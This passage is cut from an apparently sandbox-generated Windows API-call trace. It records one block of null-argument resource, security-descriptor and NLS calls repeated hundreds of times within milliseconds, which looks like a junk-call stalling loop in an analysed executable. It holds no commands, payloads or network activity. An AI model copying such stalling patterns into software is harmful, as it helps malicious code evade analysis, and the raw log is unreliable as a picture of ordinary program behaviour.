GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.834] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.834] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.834] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.834] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.834] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.834] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.834] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.834] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.834] LockResource (hResData=0x0) returned 0x0 [0219.834] FreeResource (hResData=0x0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.835] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.835] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.835] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.835] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.835] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.835] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.835] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.835] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.835] FreeResource (hResData=0x0) returned 0 [0219.835] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.835] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.835] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.836] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.836] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.836] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.836] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.836] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.836] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.836] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.836] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.836] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.836] LockResource (hResData=0x0) returned 0x0 [0219.836] FreeResource (hResData=0x0) returned 0 [0219.836] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.837] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.837] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.837] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.837] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.837] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.837] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.837] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.837] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.837] LockResource (hResData=0x0) returned 0x0 [0219.837] FreeResource (hResData=0x0) returned 0 [0219.837] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.837] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.837] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.837] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.837] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.838] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.838] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.838] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.838] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.838] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.838] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.838] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.838] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.838] LockResource (hResData=0x0) returned 0x0 [0219.838] FreeResource (hResData=0x0) returned 0 [0219.838] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.838] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.839] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.839] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.839] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.839] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.839] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.839] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.839] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.839] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.839] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.839] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.839] LockResource (hResData=0x0) returned 0x0 [0219.839] FreeResource (hResData=0x0) returned 0 [0219.840] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.840] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.840] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.840] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.840] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.840] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.840] IsNLSDefinedString (Function=0x0, 